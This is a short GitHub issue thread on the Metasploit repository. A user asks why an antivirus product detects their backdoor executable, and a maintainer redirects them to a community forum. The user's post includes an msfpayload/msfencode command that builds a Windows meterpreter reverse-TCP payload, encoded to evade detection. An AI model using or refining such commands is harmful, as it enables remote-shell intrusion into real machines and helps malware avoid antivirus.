### ISSUE TITLE
Need Help with Backdoor

### ISSUE THREAD

**Issue by shakmalik89** [rapid7/metasploit-framework#4620]
I am making a backdoor but it is always detected I used this command:

root@kali:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.x.xxx R| msfencode -e x86/shikata_ga_nai -t exe -a x86 -b '\x00\x0a\x0d'-c 1 x > /root/Desktop/test.exe
[*] x86/shikata_ga_nai succeeded with size 314 (iteration=1)

And this file is detected on Windows 7

**Comment by void-in** [comment]
Use https://community.rapid7.com for such questions. The issue page of this repository is used for bug reporting. What you are experiencing is not a bug.

**Comment by shakmalik89** [comment]
Ok Thanks!
